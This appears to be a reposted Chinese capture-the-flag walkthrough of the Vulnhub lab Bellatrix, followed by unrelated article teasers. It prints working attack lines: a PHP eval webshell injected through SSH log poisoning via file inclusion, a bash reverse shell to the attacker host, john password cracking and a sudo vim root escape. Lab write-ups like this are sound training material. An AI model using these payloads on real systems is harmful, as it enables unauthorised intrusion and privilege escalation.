Vulnhub靶机:Bellatrix

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.4)

靶机:Bellatrix(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.9

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

nmap -A 10.0.2.9 -p 1-65535

在这里插入图片描述

打开网站未发现什么功能点

在这里插入图片描述

查看源码发现隐藏信息,存在一个php文件有文件包含漏洞

在这里插入图片描述

提示说有文件包含漏洞的文件已经告诉我们了,我们查看网站首页有一个php文件名:ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php

但直接访问该文件发现显示该文件不存在,再次查看文件名发现它是由很多重复项ikilledsiriusblack构成,可以猜测文件名为ikilledsiriusblack.php,访问该文件回显成功,该文件存在

三、漏洞利用

我们可以访问http://10.0.2.9/ikilledsiriusblack.php?file=/etc/passwd,发现靶机存在三个用户root、lestrange、bellatrix

在这里插入图片描述

根据靶机开放了22端口,尝试包含ssh日志文件/var/log/auth.log

在这里插入图片描述

可以通过在用户名处注入一句话木马,往ssh日志文件写入一句话木马

ssh '<?php @eval($_POST["pass"]);?>'@10.0.2.9

然后使用蚁剑连接

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.4/4444 0>&1'

在这里插入图片描述

获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

/var/www/html目录下发现一个奇怪的文件夹,查看该文件夹,发现两个文件

在这里插入图片描述

其中.secret.dic文件包含一些字典字符串

在这里插入图片描述

Swordofgryffindor文件保存有lestrange用户的加密后的密码

lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0

在这里插入图片描述

我们可以尝试使用john工具对lestrange用户的密码进行暴力破解,字典选用.secret.dic文件里面提供的,得到密码:ihateharrypotter

john --wordlist=secret.dic  passwd.txt

在这里插入图片描述

切换为lestrange用户

在这里插入图片描述

使用sudo -l命令查看一下具有sudo权限的程序,发现可以无密码以root权限运行vim

搜索vim提权用法:vim | GTFOBins

sudo vim -c ':!/bin/sh'

在这里插入图片描述

获取flag

/home/bellatrix/flag.txt

在这里插入图片描述

/root/root.txt

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/270775.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Sy2 Linux系统登录及用户管理

实验环境&#xff1a; 宿主机为win11 Vmware workstaion 17 目标机的OS&#xff1a; Ubuntu 2004 网络&#xff1a;NAT 获取地址&#xff1a;192.168.248.131/24 DNS,DHCP&#xff1a;192.168.248.2 第一章ppt的命令操作&#xff08;部分&#xff09; S1、执行whoami、who…

极狐GitLab 如何设置 Markdown 中的图片大小

GitLab 是一个全球知名的一体化 DevOps 平台&#xff0c;很多人都通过私有化部署 GitLab 来进行源代码托管。极狐GitLab 是 GitLab 在中国的发行版&#xff0c;专门为中国程序员服务。可以一键式部署极狐GitLab。 使用极狐GitLab 进行代码托管或者 CI/CD&#xff0c;都避免不了…

Vue3.0里为什么要用 Proxy API 替代 defineProperty API ?

文章目录 Object.defineProperty小结 proxy总结有需要的请私信博主&#xff0c;还请麻烦给个关注&#xff0c;博主不定期更新&#xff0c;或许能够有所帮助&#xff01;&#xff01;请关注公众号 Object.defineProperty 定义&#xff1a;Object.defineProperty() 方法会直接在一…

docker部署aria2-pro

前言 我平时有一些下载视频和一些资源文件的需求&#xff0c;有时候需要离线下载&#xff0c;也要速度比较快的方式 之前我是用家里的玩客云绝育之后不再写盘当下载机用的&#xff0c;但是限制很多 我发现了aria2 这个下载器非常适合我&#xff0c;而有个大佬又在原来的基础…

php常见的45个漏洞及解决方案

[TOC]&#xff08;太多了&#xff0c;目录只列出最重要的几个&#xff0c;剩下的同学们自己翻&#xff09; PHP作为一种广泛应用的服务器端脚本语言&#xff0c;在历史上曾曝出过多种安全漏洞。以下是一些PHP漏洞的类别及其简要解释&#xff0c;以及如何解决这些问题&#xff1…

一次一对一服务引起的沉思和笑话(微信号Stefan)

前情提要 客户需求&#xff1a; 分析页面代码和接口请求协议和参数需求&#xff0c;将人工下载视频怎么获得最终的视频链接&#xff0c;这一逻辑清晰的展示并讲解清除。我询问了是否需要成品爬虫&#xff0c;他说代码他自己能搞定。 我给的价格选择&#xff1a; 第一种、首…

flowable的java class task,也叫服务任务

源码地址12级程序猿-新年正当红/flowable-ui和服务任务 启动flowable-ui-app 浏览器输入下面的地址 http://localhost:8080/flowable-ui/#/ 在服务任务这里设置java类的路径 com.dmg.flowabledemo.task.MyServiceTask 当请假任务完成之后&#xff0c;自动触发这个服务任务…

Java精品项目--第5期基于SpringBoot的高速收费系统的设计分析与实现

项目使用技术栈 SpringBootMavenShiroMySQLMybatis-PlusJavaJDK1.8HTML 系统介绍 项目截图

工商全程无纸化应用与CA认证结合方案

一、引言 随着互联网技术的飞速发展&#xff0c;政务服务正逐步向数字化、网络化、智能化转型。为响应国家关于推进“互联网政务服务”的号召&#xff0c;XX工商管理局致力于实现工商企业网上注册全程无纸化&#xff0c;提升政务服务的效率与质量。本方案旨在结合陕西CA认证中…

PowerBI怎么修改数据库密码

第一步&#xff1a;点击转换数据 第二步&#xff1a;点击数据源设置 第三步&#xff1a;点击编辑权限 第四步&#xff1a;点击编辑 第五步&#xff1a;输入正要修改的密码就可以了

半导体行业案例:Jira与龙智插件助力某半导体企业实现精益项目管理

近日&#xff0c;龙智Atlassian技术团队收到了国内一家大型半导体企业的感谢信。龙智团队提供的半导体行业项目管理解决方案和服务受到了客户的好评&#xff1a; 在龙智团队的支持下&#xff0c;我们的业务取得了喜人的成果和进步。龙智公司的专业服务和产品&#xff0c;是我们…

解密Lawnchair:打造个性化极致的Android桌面体验

解密Lawnchair&#xff1a;打造个性化极致的Android桌面体验 1. 简介 Lawnchair是一款知名的Android桌面定制工具&#xff0c;旨在为用户提供个性化极致的桌面体验。作为一个开源项目&#xff0c;Lawnchair融合了简洁、灵活和强大的特点&#xff0c;让用户能够自由定制其Andro…

1.5如何缓解图像分类任务中训练数据不足带来的问题?

1.5 图像数据不足时的处理方法 场景描述 在机器学习中&#xff0c;绝大部分模型都需要大量的数据进行训练和学习(包括有监督学习和无监督学习)&#xff0c;然而在实际应用中经常会遇到训练数据不足的问题。 比如图像分类&#xff0c;作为计算机视觉最基本的任务之一&#xff0…

必看——GlobalSign代码签名证书怎么申请?

一、GlobalSign代码签名证书申请流程 第一部分&#xff1a;选择适合的证书类型 1. 访问官方渠道&#xff1a; 首先访问JoySSL官方网站页面&#xff0c;浏览并了解不同类型的代码签名证书选项&#xff0c;包括但不限于标准代码签名证书、扩展验证&#xff08;EV&#xff09;代码…

AIOps常见问题

AIOps的自动化通常指什么&#xff1f; AIOps 平台的自动化一般包括以下几个方面&#xff1a; 数据收集和整合&#xff1a;AIOps 平台可以从多个 IT 基础架构组件、应用需求与性能监视工具以及服务工单系统等数据源中收集并整合运维数据&#xff0c;形成一个全面的数据平台。数…

设计模式之模版方法实践

模版方法实践案例 实践之前还是先了解一下模版方法的定义 定义 模板方法模式是一种行为设计模式&#xff0c;它定义了一个骨架&#xff0c;并允许子类在不改变结构的情况下重写的特定步骤。模板方法模式通过在父类中定义一个模板方法&#xff0c;其中包含了主要步骤&#xf…

1、MQ_介绍、优缺点、类型等

MQ介绍 1. MQ概述 MQ&#xff08;Message Queue&#xff09;&#xff1a;消息队列&#xff0c;是基础数据结构中FIFO&#xff08;first in first out&#xff09;的一种数据结构。一般用来解决流量削峰、应用解耦、异步处理等问题&#xff0c;实现高性能&#xff0c;高可用&a…

Salesforce 2024财年爆发式增长!第一次现金分红

对于Salesforce来说&#xff0c;这是非凡的转型之年&#xff0c;所有的关键指标都表现强劲&#xff0c;现金流和利润增长创下了纪录。截至第四季度末&#xff0c;Salesforce的剩余履约价值&#xff08;RPO&#xff09;总额为569亿美元&#xff0c;同比增长17%。 Marc Benioff …

H5小游戏,斗地主

H5小游戏源码、JS开发网页小游戏开源源码大合集。无需运行环境,解压后浏览器直接打开。有需要的,私信本人,发演示地址,可以后再订阅,发源码,含60+小游戏源码。如五子棋、象棋、植物大战僵尸、开心消消乐、扑鱼达人、飞机大战等等 <!DOCTYPE html> <html> <…